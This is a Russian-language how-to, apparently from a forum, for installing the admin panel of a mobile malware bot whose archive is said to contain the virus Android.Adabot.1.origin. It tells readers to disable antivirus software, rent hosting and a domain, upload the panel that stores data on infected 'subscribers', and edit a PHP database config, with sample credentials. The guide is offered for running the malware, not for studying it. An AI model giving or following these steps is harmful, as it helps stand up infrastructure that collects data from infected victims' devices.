1) Качаем архив по ссылке которую я вам дал. Предварительно отключаем все антивирусы которые есть, т.к. АВ убьет файлы при распаковке (там вирус Android.Adabot.1.origin)
2) Нам будет необходим хостинг и домен. Хостинг должен быть с поддержкой БД (базы данных) На домене будет располагаться админ панель вашей версии БОТА и его БД с информацией о ваших подписчиках.
3) В архиве мы видим 2 файла: «!work» (это админ панель) и «rebot» (это сам мидлет с вирусом) Мидлет пока не трогаем — по нему информация в отдельной теме.
4) Распаковываем файл «!work» и закачиваем папку BN на хостинг в корневую дерикторию домена.
5) Далее подключаем базу данных через панель управления хостингом, называем ее к примеру baza1 (файл для экспорта базы находится в папке !work, только меняйте его название на свое)
В базе данных необходимо поменять логин и пароль на свой — логин должен быть в явном виде, а вот пароль в формате MD5) Ссылка на замену формата - http://md5list.ru/
Все вопросы по созданию и подключению БД адресуйте в поддержку своего хостинга! Я вам в этом не помогу.
6) Открываем файл config.php в папке !work / bn с помощью программы Notepad++.
Там уже есть код, но его надо изменить -
<?php
$mysql_ip = "localhost"; - ЭТО НЕ ТРОГАЕМ
$mysql_user = "admin"; - МЕНЯЕМ НА ЛОГИН ОТ БАЗЫ ДАННЫХ
$mysql_pass = "q141414"; - МЕНЯЕМ НА ПАРОЛЬ ОТ БАЗЫ ДАННЫХ
$mysql_base = "baza1"; - МЕНЯЕМ НА НАЗВАНИЕ СВОЕЙ БАЗЫ
НИЖЕ МЕНЯЕМ ВЫДЕЛЕННЫЙ ТЕКСТ НА СВОЙ:
$db = mysql_connect ("localhost","admin","q141414") or die("Не могу соединиться");
mysql_select_db ("baza1", $db);
?>
7) Обнавляем файл config.php на хостинге.
8) Запускаем админ-панель БОТА: --
В поле логин и пароль вводим данные в явном виде, которые вы указали в базе данных — т. е. в нашем случае это admin и q141414
9) Заходим в админку.
По установке админ-панели - все.